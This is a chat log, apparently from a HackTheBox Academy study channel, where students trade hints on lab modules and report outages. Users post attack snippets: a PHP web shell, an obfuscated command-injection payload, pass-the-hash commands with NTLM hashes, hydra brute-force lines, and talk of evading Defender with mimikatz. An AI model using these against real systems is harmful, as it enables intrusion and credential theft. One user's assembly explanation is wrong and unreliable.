#modules

1 messages · Page 338 of 1

stable jasper
#

Thank you 👍

next bronze
#

--max-retries affects port probes too, sometimes a port can be open but closed later during a scan

jolly yacht
# next bronze `--max-retries` affects port probes too, sometimes a port can be open but closed...

But if I check how much probe the nmap sent to the target through --packet-trace it only SENT 2 times and concluded the response if the host discovery is disabled or only SENT 8 times and concluded the response if the HOST discovery is enabled. That's the part I am confused about, I mean why it did not sent 10 probes as mentioned in the --max-retries when it does not received any response?

rustic sage
#

What is the other question you are having a difficult time with as well?

patent blaze
#

Is HTB academy down?

rustic sage
next bronze
lunar turtle
jolly yacht
# next bronze it only affects port scans, not host discovery

okay but i tried with port scan too by disabling host discovery. like it did not tried on sending 10 probes before concluding the result when it does not received any response from the target but just by sending 8 probes then it just concluded that the response as filtered even though it mentioned to sent 10 probes in --max-retries in default.

next bronze
quartz coral
jolly yacht
light folio
undone cypress
tender nimbus
#

anyone can help?

quiet trout
#

anyone getting 500 errors at login? just starting up for the day

#

repeated 500s after login, browser reset, cookies restet etc.

tender nimbus
hollow frigate
#

is the academy server down, was working on it earlier today but getting the following error: 500 | Server is not feeling well

gilded cave
#

The nibble academy machine has been instable as well

hollow frigate
#

after login just get that 500 error

gilded cave
#

Yes, I confirm the behaviour; After logout cannot login anymore; The error message is 500 Server is not feeling well

hollow frigate
#

think i will wait an hour or to then try again

old oasis
#

damn, was about to answer the last question of a module :/

unborn plaza
#

yes, the same for me

500
Server is not feeling well

tender nimbus
#

guys i have issues with this one any help?

#

password cracking module password hunting in windows section

steel gale
#

i was about to ask if the login areas are bugged but i think yall already answer my question.

opal nexus
tender nimbus
bright pivot
#

if i want to add the subdomain to my etc/hosts/ .should i write like this?

old oasis
bright pivot
#

ussually it works for academy.htb

#

but i donot know how to add the subdomain

old oasis
#

well if it works then its fine

#

the format looks fine too

acoustic owl
weak nymph
#

Hi, do ya know if certs only can land you a job in Europe ? I'm still trying to know 🤔

shell ore
#

so if you can, do it

gray yacht
#

Maybe see if there are other services running that will accept those creds.

echo sundial
#

Hi everybody
I got stuck in the Exploiting SSTI - Twig Example from Server-Side Attacks. I have the RCE and when i do 'ls' i don't see any flags,
am i looking for it in the wrong place ?

brave scroll
#

I'm facing this issue again and again

#

While solving:
Host Based Enumeration
Topic: Oracle TNS

next bronze
#

did you install it correctly?

limber river
#

No

echo sundial
quiet trout
viral badger
#

anyone else?

glacial minnow
#

i need help with nmap IPS evasion Hard, i tried ``` *]$ sudo nmap 10.129.77.45 -p 50000 -sSU --source-port 53 -sV --disable-arp-ping -Pn

#

also -sA, -sT, T1 send delay 50s , decoys -D RND:5 but nothing. keep getting ibm-db2 or tcpwrapped, nc yields nothing

#

and filtered. am i looking at the correct service?

stable jasper
#

i need help with the medium nmap ips lab, cant manage to find the dns version. already try every solution i find on the htb forum

shut vapor
# viral badger anyone else?

just refresh the page and try again. Maybe switch regions. It happens once in a while. labs have been working for me.

shut vapor
#

oh wait, did you just edit that?

glacial minnow
#

deleted some stuff yeah i think i was tripping

shut vapor
#

Ok, yeah, you're //really// in the right direction but maybe throw things at the problem one at a time though.

#

Definitely note the differences when you're specifying a source-port vs not specifying that source port. Think of any other utilities that might garner you information from the service.

brave scroll
rose sage
nova surge
#

I'm a bit stuck on assessment II for nosql.. anyone available for a small nudge?

rose sage
stable jasper
shut quest
stable jasper
devout spruce
#

Is HTB Academy having issues atm? I can't terminate my machine for whatever reason. The button for it is gone.

#

Currently on SQL Injection Fundamentals

devout spruce
#

Yeah I did

#

This has been happening for me off and on for the past 2 days actually.

#

I usually have to wait for the timer to run out but even when I start up a new target I can't always connect to it.

quiet trout
#

Anyoner know how to deal with the "there are no active instances left" im in the middle of a module end assesment and had to reset, now im caught in this... tried clearing browser data and logging out and back in, changing pwnbox location...

anything else?

quiet trout
#

ok good to know

quiet trout
#

there was 5XX errors this morning, that seems to have been solved but we still seem to be having issues and we're not seeing anything in the announcements yet -_-

#

@burnt steeple @old oasis any luck yet? none here

#

i guess im gonna call it quits for a while... -_-

quiet trout
#

kk thx, imma fuck off for a bit then

burnt steeple
#

"There are no available instances. Please try again later."

junior warren
#

so the issue with the instances not available is not happening only for me right?

rustic sage
#

There is an issue with pwn box

rustic sage
#

Guys, can you connect to VM?

acoustic owl
#

Yes, you can use VPN to access the Modul Labs with your VM

rustic sage
opal nexus
rugged turtle
#

Hi guys, I'm doing the Skill Assessment of the Pivoting module.
I'm having a hard time in enumerating the network once I'm logged on the INLANEFREIGHT machine. Can someone tell me whether I'm on the right path in trying to scan the whole 255.255.0.0 subnet? Because I've tried 255.255.255.0 and it didn't lead to anything

echo rune
stable jasper
shut vapor
dim wolf
#

i'm pretty sure that's not a network in the lab

shut vapor
#

like, /16 or /24 but as a netmask

topaz cliff
#

I need to know about the possibility of transferring any remaining credits from my HTB platform account to the Academy platform. I am interested in using these credits to purchase boxes for modules within the Academy

quiet trout
rugged turtle
rugged turtle
shut vapor
#

However, as calculatedOre suggests, I hope you're not scanning 255.255.255.0!

quiet trout
#

You've got it right, it's just that most windows machines don't respond to icmp scans .. (pings) so you'll need to utilize other scanning methods...

rugged turtle
shut vapor
#

😬

#

Live and learn :-)

quiet trout
#

When you do a bunch of Linux boxes and find yourself on a Windows target you may get used to them responding then chase your tail for a bit... Ask me how I know ;P

bright pivot
#

why i cannot open the link?

quiet trout
old oasis
#

yeah there is a difference between academy VPN and labs VPN

quiet trout
#

If you're certain you're connecting to academy try to redownload a fresh connection file and failing that... Are you doing a Windows machine? It won't respond to ping and may not have a web server running on port 80. Scan it

old oasis
#

I did the same mistake earlier

winged depot
#

Hi, I am doing the last tasks in Getting Started Module. I am logged as an Admin in the web but I can´t upload any files.

quiet trout
#

Have you pinged the target? Looks like a WordPress site, go thru the instructions make sure it being served on an uncommon port and verify you're getting that response from ping

#

Oh snap, check for http title and add to hosts of course ... You can get that from 'nmap -vv...'

#

Sometimes instructions tell you what hostname to use in hosts file as well

#

Likely a vhost being used which will require an addition to your host file

shut vapor
bright pivot
shut vapor
#

I would advise you to learn nmap more than rely on autorecon every time. At least to start. What I do is issue a series of progressively time-intensive scans and you should probably work out your own procedures:

  • Two scans: default TCP scan and a default UDP scan... this gets everything like 95% of the time
  • Standard scan but with -sV or maybe some other scripty stuff, banner grab, whatev
  • Then do the weird sans like ACK scans or whatever
  • Finally start full TCP / UDP scans and let them run in the background but move on to inspecting all the stuff you'll have almost instantly found with the first scans.
timber hatch
#

somebody online who has done the digital forensic modul?

shut vapor
#

That's kind of what I was suggesting. I mean, chaining them together -- especially the slower stuff. And, yeah, I have to explore autorecon myself but if youre on the nmap modules might as well get used to using nmap because that nitty-gritty knowledge comes in handy more than just throwing a comprehensive tool at the problem.

formal mural
#

Hi all,
I am trying to answer 'Try to exploit the upload form to read the flag found at the root directory "/".' on the File Upload Attack skills assessment.
I've managed to find upload folder directory and confirmed I can see a test image file from it. I am a bit stuck on uploading a file. I have intercepted the upload page and have used intruder to find some extensions I could use to bypass and upload. I am now just stuck on trying to submit it.
Is anyone able to help nudge me?
Apologies if it's really simple, have been at this for a little while.

lofty whale
#

Any thoughts? On the mssql section of footprinting. Have tried it on kali as well as the pwnbox

stark hull
lofty whale
#

Heard. Thank you

opal nexus
formal mural
opal nexus
formal mural
timber hatch
lofty whale
proper oar
#

any simple way to transfer files from host to pwnbox? Working on evasion module - dynamic analysis. Switching betweeen the DEV and TARGET machines is time consuming and a pain, so I figured making them locally would be easier

timber hatch
timber hatch
pliant yacht
#
  • 0 Try adding any of the injection operators after the ip in IP field. What did the error message say (in English)?

But

please match the requested format. is saying invalid

dry crest
#

Hello everyone ! For the Injection Attacks module,(Web pentest) Skill assessment. I got all the xml in the invoice but i`m stuck in getting the data from the arrays.

solid snow
#

Hi

#

Can one help me

shell ore
grand solar
#

anyone know how to fix an issue where mssqlclient.py logins and runs normally until you try to use and the commands give no response back? I tried googling it but no one else seems to be having this issue

shell ore
solid snow
#

Code error 600?

shell ore
#

make sure ur using the latest version, it MIGHT work

muted jacinth
#

Hello,

Anyone got an hint to get the last flag of the SA of the introduction to sliver module?

Got DC02 pwned but can't really figure how to move on from here

grand solar
shell ore
safe star
grand solar
dim wolf
#

please refrain from spoiling module content.

simple ruin
#

mannnnnnn lol

safe star
median gale
#

in cases such as the exercises of file upload attacks where there is no need to connect to vm, what options are there if the connection is way way too slow?

#

None i guess right?

dim wolf
#

nvm, Getting Started is Tier 0. should be ok

simple ruin
dim wolf
dim wolf
#

look for something else you can use

wooden silo
#

I'm currently on the "attacking FTP" module in week 6 "attacking common services" and I cannot find the FTP port. Is there a command I need to use that I'm not using? Every time I run an nmap scan the scan shows no open ftp ports. Is there something I'm missing?

proper oar
#

Has anyone else had trouble in Windows Evasion - Dynamic Analysis - using the shellcode from the tool provided? I can't get a callback in the shell after AES encrypting it for some reason, no error, the cmd prompt runs after launching the NotMalware.exe and there is no callback on the listener. The following (Option #3) C# program works fine, and the shellcode in the previous module worked fine. I also tried without it being AES-encrypted and it also did not work for me like that. Any thoughts on what is going wrong?

safe star
wooden silo
cloud urchin
#

oh wait you said you did try them, so you got the flag then?

#

i don't think anything is 'wrong' there's only 1 method that works in that section

dapper moth
#

Try passing the IP and port directly in the code to that custom C# code in the Dynamic analysis section

#

You should get a shell

#

The automation script won’t know what’s your network specs to call back

wooden silo
#

anyone else having trouble finding the FTP port in Week 6 "attacking FTP"?

proper oar
dapper moth
simple ruin
safe star
cloud urchin
safe star
#

you skipped the first part

nova surge
#

Anyone here who can give me a slight nudge for NoSQL skill assessment 2 ?

gilded cave
#

The issue persists both using the Pwnbox and local machine + VPN

cloud urchin
gilded cave
#

No, it seems the machine is not responding

gilded radish
#

sometimes it happens

gilded cave
#

I refreshed the page, and Terminated the spawn

#

and the Spawn a new machine, with a new IP
But it keeps somehow not responding to some requests

gilded cave
#

Currently, only using my local machine + VPN

gilded radish
#

try both, Idk why, but it really happens sometimes and you should try pwnbox

shut vapor
#

Just a curiosity, but what exactly is a Service Principal Name (SPN)? It's not an Active Directory object I don't think. It is an attribute of a user, or an attribute of a service running on a computer?

cloud urchin
#

here's what to do: terminate the target. terminate the pwnbox if it's on. disconnect from the VPN. re-download a fresh new vpn file. connect to the vpn. hard refresh the page where you spawn the target with CTRL+SHIFT+R, wait 5 mins after it spawns and try again. that should clear up any issues.

shut vapor
#

Googling just gets me some variation on it's being a "uniquie ID that ties a service to the user account running that service"

#

Ok. I found something that sort of explains it. Best I can tell they're like "aliases" to an user object that reference a binary (the service part) and apply to a computer object... so they're not exactly objects or attributes. Microsoft is so weird.

cloud urchin
#

SPN's are unique identifiers for a service instance in a network that uses kerberos authentication. it's a string that identifies a service instance. they help identify which server or service the client is trying to connect to and ensure proper authentication.

shut vapor
cloud urchin
#

it's a string identifier

shut vapor
#

Sure. String identifier is just like... a type of data as I see it. Like a GUID or an integer ID. So I can understand that in the context of a field in a kerberos token, but everything else in AD in an object. Like, are there other string identifiers that aren't SPN's? Probably, but they're probably properties of an object where SPN's are not objects.

#

Anyway, it's neither here nor there. I'm just trying to I guess refine my understanding and terminology.

cloud urchin
#

spn's are stored as attributes of certain objects, aka the servicePrincipalName attribute

#

so yes they are attributes

#

i guess more technically it's a value of an attribute

tender nimbus
#

Hey guys i'm stuck at password cracking module hunting on linux section

#

with the hint they said that they found a user kira with a certain password but when i use tools to enum users on the machine i can't find a kira i just find a sam

simple ruin
#

ahhhhh not installing key.pub on target... smh

tender nimbus
#

Just took a look and i suppose the thing was to brute force creds with hyrda using the usernames on htb resources and the rockyou txt file? If anyone can help me with telling how you normaly find the kira user ^^

#

i found different users like ||will:123456, john123456, dennis:123456|| and a bunch of others with the same pwd but i can do nothing with it

#

and if you do it with te rockyou list it tkaes dayssss

rough phoenix
#

Hey everyone,

I’m encountering issues with Login Forms on Login Brute Forcing module and I think I’ve set everything up correctly. Here’s the Hydra command I used:

||hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 83.136.254.47 -s 41425 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'" -t 60||

This is the output I got:
[DATA] max 60 tasks per 1 server, overall 60 tasks, 3400 login tries (l:17/p:200), ~57 tries per task
[DATA] attacking http-post-form://83.136.254.47:41425/login.php:username=^USER^&password=^PASS^:F=<form name='login'
1 of 1 target completed, 0 valid password found

Despite running the attack, no valid passwords were found. Can anyone provide some guidance or hints on what might be wrong? Any help is appreciated!

gilded cave
balmy lotus
#

can i get a sanity check plz on "Advanced Command Obfuscation" exercise - https://academy.hackthebox.com/module/109/section/1039?

the payload is || ip=127.0.0.1%0a%09{ta"i"l,-n,1}<<<$(g"re"p%09mysql)<<<$(g"re"p%09r"oo"t)<<<%09$(f"in"d%09${PATH:0:1}u"s"r${PATH:0:1}s"ha"re${PATH:0:1})|| and the output is ||/usr/share/glib-2.0/schemas|| but it's not liking that answer

shut wraith
#

is there something wrong with this command:

evil-winrm -i 10.129.78.245 -u INLANEFREIGHT\lab_adm -H A96ED648BE6FFFB03F3E086F25282F2D

balmy lotus
shut wraith
#

Can u please show me

#

correct command so i can understand

balmy lotus
#

do you have one or two \ in the username

#

bc discord is escaping them too, so to get \\ i have to use 4

shut wraith
#

username is lab_adm from the AD enum and attack module

balmy lotus
#

right but you have the domain. do you have one or two \ between them

#

if 1, try 2. if 2, try dropping the domain

shut wraith
#

it just doesnt work no matter what ... Did anyone try to pass the hash on this module using evil winrm ?

balmy lotus
#

or use / instead of \

#

what module

balmy lotus
#

might be the wrong user, i seem to recall thinking lab_adm user was for internal use not for student use

#

but link the module, maybe it'll jog my memory

shut wraith
# safe star Is the user able to winrm?
  1. I have checked through CME exploiting SMB to test hash if it auths and it did to many hosts

  2. then I checked which of those hosts there is winrm port open

  3. still not work ...

safe star
#

Probably forgot tho

shut wraith
#

Is this the correct order of operations for me to do ?

#

Also it is kind of tedius to have to cross check IPs to find this stuff .. any better method ?

balmy lotus
#

bro link the module so i have a clue what you're asking about... or i guess wait for someone else to help

shut wraith
#

Sorry guys I made a mistake, the hosts that have win-rm dont match the hosts that have smb which the hash worked on...

#

Maybe I just didnt find the right user yet

#

But I did find hosts that are vuln to eternal blue so Im gonna try that ...

balmy lotus
#

that link just went to the initial enumeration page i don't think that's the right link

shut wraith
balmy lotus
#

aight yeah good luck, hard to help if i dunno what exercise you're working on / trying to replicate

shut wraith
balmy lotus
#

hrm i suppose it should include mysql since it's being grep'd huh

#

thx figured i was missing something dumb... now to figure out why it ignores the greps

safe star
#

that command is so long 😭

simple ruin
#

i feel sooo close but cant save key to remote target???

safe star
#

they explain everything you need to do

simple ruin
cloud urchin
balmy lotus
safe star
simple ruin
cloud urchin
#

with root you should be able to write to the folder

#

or chmod it

strange delta
#

how many min required to crack the hash on Password Attacks Passwd, Shadow & Opasswd? (ive tried 15m with rockyou.txt but i did get the password)

cloud urchin
#

the password attacks module can take a bit longer, but nothing should be more than like 30 mins or so

#

most of the modules that have cracking in them take a few minutes except that password attack one. not sure about cracking with hashcat as i didn't do that module.

simple ruin
#

oohhhh i haven't actually been root... hmmm

cloud urchin
#

i told you 😛

simple ruin
simple ruin
final maple
#

Can anyone nudge me on the Server-Side Attacks - Skills Assessment? Some people have talked about being given login creds off the bat, but I am not seeing any of those. I am also not seeing the ||static/jquery.js|| that others have talked about. Has this lab been changed?

cloud urchin
#

it was recently updated yeah

uneven cairn
#

what is the god damn answer: What is one prominent issue with passwords?
Broken Authentication
Brute-Forcing Passwords

storm elk
uneven cairn
storm elk
#

Take some time to do something relaxing and go to bed 🙂 the brain needs some time to wind down

sleek moss
#

hi guys how should i organize notes or make notes on what etc note tips?

storm elk
#

I’m personally a fan of Obsidian

#

But there’s many out there

#

Try some out and stick with the one that feels most comfortable to you

sleek moss
#

i c thx do u have any advice o nhow to orgnaize it tho

#

like just make a new file for each module for each page and just note down most important bits

#

?

wooden silo
#

how do we enable copy and paste into our pwnbox?

#

specifically from my system to the HTB vm

safe star
storm elk
#

I create a folder for each module and page for sections. Separate page for cheatsheet

storm elk
#

I use chrome on Mac

wooden silo
storm elk
#

I didn’t need to change any setting. Only thing I experience is that if I have pwnbox in a separate window, I need to copy after refreshing for a proper resize

wooden silo
#

Does Firefox just not paste then?

storm elk
#

I can’t answer that, haven’t used Firefox for HTB yet

cloud urchin
#

There's an icon in the lower right you need to click on, that opens a window you can paste into from your machine, it's the clipboard for the pwnbox too so if you copy something in the pwnbox it's there in the clipboard.

#

If you don't see it turn off adblocker

wooden silo
cloud urchin
#

why? is your adblocker bad and can't disable it for a single domain?

#

not like there are ads on htb

wooden silo
#

JK obviously, I appreciate the info

wicked apex
#

Module: File Upload Attack
Section: Blacklist Filters:
Are we suppose to escape the sanitization in the upload?
intruder (URL encoding OFF) and discovered the whitelisted extensions.
And uploaded the payload via proxy and modifying content to <?php system($_GET["cmd"]); ?>
But even with it shown as uploaded successful, when I browse to that page under /profile_images/ with the required parameters, it will not shown the content at all

#

More than that, when i inspected page source, I found out that my payload content was commented out

#

Oh never mind
I see why now

#

Need to do more enum next time

timber hatch
#

I don't really get the digital forensics module. Now, the skill assessment is with Velociraptor, but the module only gave a brief introduction to the tool.

#

strangest module ever done at htb

#

but i want end it and rate it, muhaha

#

timber hatch
#

i mean how bad is a module, when you reach the skill assesment and dont even know where to start.

next stone
#

Skills Assessment - Easy
Abusing HTTP Misconfigurations

Can someone help me with this?

neat pelican
#

Good Day I need help in Vulnerability Assessment Nessus Skills Assessment

Problem: HTB gave information of the target 172.16.16.100, and credentials for authenticaition. However, upon doing ping on 172.16.16.100 there was no response. So I did a basic network scan on the spawned pwnbox. The pwnbox has a different credential from the given target 172.16.16.100 so I add both credentials for windows authentication. The scan went well and it has infos, and detected vulnerabilities. However, upon searching for SMB there were no results, so I assume that the authentication was a failure. If someone can enlighten me what I did wrong, it would be a huge help. TY!

next stone
#

It seems like a session puzzling auth bypass issue but can't exploit it!
There is also a reflected XSS on the products page but there isn't any caching mechanism in place to exploit that.

next bronze
neat pelican
#

Apologies, I may have created confusion, to sum things up.

From the Requirements section:
Target: 172.16.16.100
creds: administrator:Academy_VA_adm1!

From the Spawn Target:
Target: <Some IP when spawned>
creds: htb-student:HTB_@cademy_student!
Because it says here... "Authenticate to <spawned target IP> (ACADEMY-VA-SCAN01) with user "htb-student" and password "HTB_@cademy_student!""

Used kali linux WSL2
I did put the IP from requirements, and spawn target. But nessus only scanned the spawn target. Additionally, there was no port 445,139 detected in the service, I also double checked this using nmap.

next bronze
# neat pelican Apologies, I may have created confusion, to sum things up. **From the Requireme...

Nessus can be accessed at https:// < IP >:8834. The Nessus credentials are: htb-student:HTB_@cademy_student!. You may also use these credentials to SSH into the target VM to configure Nessus.
Once logged in, perform a BASIC NETWORK SCAN (modify the scan template to scan ALL ports, leave all other options the same) against the target: 172.16.16.100. Additionally, set up the scan to be authenticated using administrator:Academy_VA_adm1! as the credentials.

#

don't use pwnbox to scan

timber hatch
#

can anybody say me how to start the skill assesment in digital forensic. totaly lost

#

i mean am on right track here? or i am total wrong? i have no idea?
these are the artifacts\collections right? now the first question is about VAD.
i have collected the windwos.system.vad for the first question, do i have to do this for every artifcat?

#

how should i analyze them? download as csv and than?

#

i just want to end the damn module and rate with 1 star

sinful wigeon
#

hi

timber hatch
#

any mod online who can help?

dim wolf
acoustic owl
#

And why do you need a mod for this?

timber hatch
dim wolf
#

mods can't necessarily help with that

#

use what you've learned to complete the assessment

timber hatch
#

thats the point. don't really get the digital forensics module. Now, the skill assessment is with Velociraptor, but the module only gave a brief introduction to the tool.

dim wolf
#

for this module it does drop you right in, but it's easy to figure out once you realize what you need to do

#

just have a closer look at the Velociraptor section and it should be clear

timber hatch
#

or do i have to buy the annual subsrciption for a step by step guide kek

dim wolf
#

i don't have my notes atm so i can't tell you

acoustic owl
timber hatch
#

ok, thanks. but i am a bit confused, there are a lot of flowd ids, those are collections? now do i have to "hunt" the vad for every flow id?

acoustic owl
#

How did you solve it in the module a few sections earlier? The method is exactly the same, only the data is different

glad patio
tender nimbus
#

Hey guys can someone help me with this? its password crackingm module linux haunting section?

#

I found a zip on the target with a password on it i tried to bruteforce it and found a pwd but it doesnt work

#

just want to know if im on the right path

acoustic owl
neat pelican
# next bronze > Nessus can be accessed at https:// < IP >:8834. The Nessus credentials are: ht...

Thank you for this, and for your patience. I now understood the instruction, and the main problem was accessing the https://<spawn_target_ip>:8834 saying that site can't be reached, both Firefox, and Chrome. I did however successfully connected to HTB VPN, even replaced it, pinged, and nmap <spawn target ip> -p8834 which results to an open port. I accessed the machine's nessus through pwnbox and it worked. But I am still left clueless why the machine isn't accessible through my browser

tender nimbus
acoustic owl
#

Follow the module. It shows you exactly how you can crack what and what you need to pay attention to.

sacred jacinth
next bronze
neat pelican
next bronze
#

don't use vpn and pwnbox at the same time

timid nexus
#

can someone help me with the linux basics module, to get the answer to this question? Which kernel version is installed on the system? (Format: 1.22.3)

sacred jacinth
timid nexus
#

no

sacred jacinth
#

read the section again

timid nexus
#

okay

sacred jacinth
#

it's there

timid nexus
#

thank you

neat pelican
# next bronze don't use vpn and pwnbox at the same time

I see now that the problem lies within my WSL2 environment. While I can access the targets from previous lessons, accessing https://<spawn_target>:8834 is another issue. I downloaded an openvpn software for windows and used the openvpn file from HTB and is accessible. Thank you for sharing your solution, sir

merry stone
#

I am stuck at Footprinting / smtp / + 1 Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
I know I can do brute forcing to get the username but is there a manual way that i can use?

sacred jacinth
next bronze
neat pelican
sacred jacinth
next bronze
#

I'd recommend using a standalone visual machine since there's no gui in wsl

neat pelican
#

Due to potato spec, I had to devise a simple and light-efficient way to use kali. I did use parrot OS and is lighter than kali, but I might need to wait to buy for upgrades.

next bronze
#

ah I see, if that's the case then probably using pwnbox would be better

soft reef
#

Does anyone know where to find a section about modifying lazagne/mimikatz so I can be use when defender is running? I've can't find it anoymore.

next bronze
#

that is always evolving, things that work a couple months ago will get detected

#

I have a project that does it but you'll need to modify it a bit

cloud urchin
#

the windows evasion module goes over obfuscating the rubeus source code to avoid detection, probably could apply to lazagne and mimikatz too. but i haven't seen a module about lazagne/mimikatz specifically. (i haven't done all the modules either)

next bronze
#

laz and mimi are exe so it's not as simple as just encrypting and injecting into a remove process but the idea of evasion is similar

soft reef
#

Yes that's where I've seen if I recall right, it similar to changing shellcode but maybe I'm mixing it up.

cloud urchin
#

it teaches using threatcheck to find where defender detects it then modifying the source code

#

its in the open source software section

soft reef
#

yes thats the one thanks

#

whats the equivelant for linux root on windows?

cloud urchin
#

nt authority\system

soft reef
#

thanks

tardy sleet
#

Hi

merry stone
#

so is there a way to do it without brute forcing?

tardy sleet
#

How do I speak in general?

cloud urchin
tardy sleet
midnight galleon
#

someone to DM about many AD stuff?prayge

pseudo kiln
#

its better to just post the questin imo

quiet trout
#

has the pwnbox issue been sorted? i see we're still getting a warning at login.

grand portal
#

im having tough time with password attacks-

quiet trout
midnight galleon
quiet trout
quiet trout
#

good questions beget good answers

grand portal
tender nimbus
#

hey guys im trying to crack a shadow file i did those commands

hearty pelican
#

guys you guys know how much of academy should i do to make sense in uying labs

quiet trout
grand portal
quiet trout
grand portal
opal nexus
#

I have a question about Attacking Enterprise Network - in the section 'Exploitation & Privilege Escalation' walkthrough, some credentials were mentioned. my question is, is it possible to obtain said credentials even without the walkthrough? I tried to use some metasploit module but It didn't work.

*I've tried to be as vague as possible in the details to avoid spoilers, however I can DM the questions with more details to get better answer.

sacred jacinth
zealous vault
#

Hello I've just started learning, and am looking for a mentor

sacred jacinth
zealous vault
#

Damn any advice then

trail egret
#

idk im doing everything right but still its getting struck here : ┌──(hx0r㉿kali)-[~/Downloads]
└─$ impacket-psexec Administrator@10.129.204.23 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[] Requesting shares on 10.129.204.23.....
[
] Found writable share ADMIN$
[*] Uploading file ejzYzEBK.exe

quiet trout
#

prob really worth it tho... for the right one

quiet trout
rustic sage
#

hey guys I am probably a beginner is secrity I did networking, windows and linux fundamentals from htb academy. Should I start preparing for the CPTS exam?

trail egret
quiet trout
#

ok so its in the middle of the upload? how big is the exe its uploading?

trail egret
#

Same thing with crackmapexec ..Im not able to execute any commands after -x flag

quiet trout
#

re-run the cmd and tap the space bar button after a few minutes, to try and kick the terminal over?

maiden field
#

Is there a problem with htb ?

#

I get a 502 on the site

quiet trout
#

log out, clear browser cache, etc.

maiden field
#

ok thanks !

quiet trout
#

chat gpt says that its a "hidden machien account" is this a good answer?

next bronze
#

all computer accounts' sAMAccountName ends with a $, $ after a share name means it's hidden

quiet trout
#

ie: its a known host would /user:DC2 also work?

next bronze
#

it's just to differentiate between user and machine accounts

quiet trout
#

OH

#

ty

opaque niche
#

hey...so ummm

#

im not able to message in the general chat?

acoustic owl
solar grove
#

Pivoting, Tunneling, and Port Forwarding
SSH for Windows: plink.exe

I don't understand what to do in the module, I connected with rdp but there is no program called Proxifier

Attempt to use Plink from a Windows-based attack host. Set up a proxy connection and RDP to the Windows target (172.16.5.19) with "victor:pass@123" on the internal network. When finished, submit "I tried Plink" as the answer.

marsh fractal
#

Hello can anyone help me for Attacking Common Applications:osTicket
i try to use credentials which in the instruction but it give error, do i need to register with dehashed which in lab and then search usernames or what?

pliant yacht
#

zap hud isnt working 👀

sterile lily
#

Yoooooooo

#

yall hackrs

acoustic owl
sterile lily
#

Ok

quiet trout
# pliant yacht zap hud isnt working 👀

i had probs with zap too, this was a month ago or so... nobody uses zap in real world you might trudge thru the zap modules if you feel ABSOLUTELY inclined, but it prob better to use burp unless you're just over invested in the module.

sterile lily
#

Answer my question

opal nexus
next bronze
#

it's found previously during the info gathering phase

next bronze
#

deleted the message because spoilers

regal sigil
#

I am having some issues with Sharphound, that the older versions are just not working and the latest version is having issues with Bloodhound(Stuck on 0%), Is there any reliable way to to fix this, which version of sharphound i should use?

next bronze
#

2.0.0

regal sigil
#

ok thanks

next bronze
#

also the bloodhound gui you're using is probably outdated, the later versions are using docker

regal sigil
next bronze
#

this version will work with the latest sharphound

regal sigil
#

i should just change my bloodhound version rather than doing the collection again, feels like the best approach

regal sigil
next bronze
#

whatever version is available in the repo

muted jacinth
#

hey guys, I'm really stuck at the last question of the c2 sliver SA.
I crafted both diamonds and golden tickets but nothing seem to work.
any hints?

median gale
#

After uploading a svg, the response shouldnt return the file we want given that the file was uploaded successfully? Or do we need to find where it uploaded to access it?

#

Nvm it was in the second response the answer not the first

vivid pilot
#

Is there anyone who can help me with this assembly code module?
This is the question, "Edit the attached assembly code to loop the "loop" label 5 times. What is the hex value of "rax" by the end? " And here is what I currently have the code set to.
global _start
section .text
_start:
mov rax, 2
mov rcx, 5
loop:
imul rax, rax ; multiply rax by itself
loop loop ; decrease rcx and repeat the loop

; After the loop ends, the value of rax will be 2^5, that is 32.
; The hex value of rax is 20.
This corrected code will loop the "loop" tag 5 times and at the end the value of rax will be 2^5 which is 32. The hex value of rax is 0x20. but it says the answer is wrong .

quiet trout
next bronze
#

better to just run the program and step through it

oblique wren
#

Can anyone help with the Login Brute Force Module on Basic HTTP authentication I keep getting Errors Child with PID terminating.

next bronze
oblique wren
#

hydra -l basic-auth-user -P 2023-200_most_used_passwords.txt 94.237.50.176 http-get / -s 81

DATA] max 16 tasks per 1 server, overall 16 tasks, 200 login tries (l:1/p:200), ~13 tries per task
[DATA] attacking http-get://94.237.50.176:81/
[ERROR] Child with pid 21892 terminating, can not connect
[ERROR] Child with pid 21895 terminating, can not connect
[ERROR] Child with pid 21896 terminating, can not connect
[ERROR] Child with pid 21894 terminating, can not connect
[ERROR] all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-06 08:58:17

next bronze
bright pivot
#

for the question number 1

oblique wren
viral lotus
bright pivot
next bronze
#

where do you even get that

bright pivot
next bronze
#

yeah so find the wordpress site

#

click around

marsh fractal
#

can anyone help me for Attacking Common Applications:osTicket
i try to use credentials which in the instruction but it give error, do i need to register with dehashed which in lab and then search usernames or what?

#

can anyone answer?

bright pivot
acoustic owl
median gale
#

Burp is way way slower than firefox, any fixes in mind? Firefox running htb exercise on browser loads immedialty but brup takes like a minute or soo. Any ideas?

viral lotus
vivid pilot
next bronze
bright pivot
next bronze
viral lotus
bright pivot
next bronze
#

add it to your hosts file?

brave scroll
#

Can anyone tell me where the issue is?

#

in FootPrinting Lab-Medium

acoustic owl
brave scroll
brave scroll
rugged turtle
#

Hi guys, I'm having issues with the Skill Assessment of the Pivoting module. Is there anyone which can help me sort it out?

#

I am basically stuck when trying to enumerate the available networks. As far as I could read online I'm supposed to be able to ping a given machine, but it seems like I cannot reach it. I don't get whether I'm forgetting something or if I'm in an edge case which for some reason doesn't make it work

olive fiber
#

chisel works just fine with other moduels

wheat blaze
#

https://academy.hackthebox.com/module/9/section/1583
Hello everyone, could someone assist me with those modules?
A question appears in that module.

"What are all the methods available to remotely access Windows operating systems?"

If we go straight to Google, we will definitely find the solution to that query. But why go for extra mile and connect each component? The answers stay the same.

wheat blaze
reef pecan
#

I have a little problem choosing the right list for Web FUZZING skill assesment.

I tried to hard set one of the args as an id or FUZZ both with the small lists. I replaced those in the command below to avoid giving out answers here, but the long list runs longer than my server stays up, so I think I am meant to use one of the short ones. Those, however, don't get me a flag. Is something with the command wrong or what list might I need to use?

ffuf -w ./cirt-default-usernames.txt:FUZZ -u 'http://faculty.academy.htb:52010/courses/endpoint.extension' -X POST -d"arg1=0&arg2=FUZZ" -H 'Content-Type: application/x-www-form-urlencoded' -fs 774,781

Apologies, ran the longest list again and found the answer. Should have been more patient.

cyan knoll
#

